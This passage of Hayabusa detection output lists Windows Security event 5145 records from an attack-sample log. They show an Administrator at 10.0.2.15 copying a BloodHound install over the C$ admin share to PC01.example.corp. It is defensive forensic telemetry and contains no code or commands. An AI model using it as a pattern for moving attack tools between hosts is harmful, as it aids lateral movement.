Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 
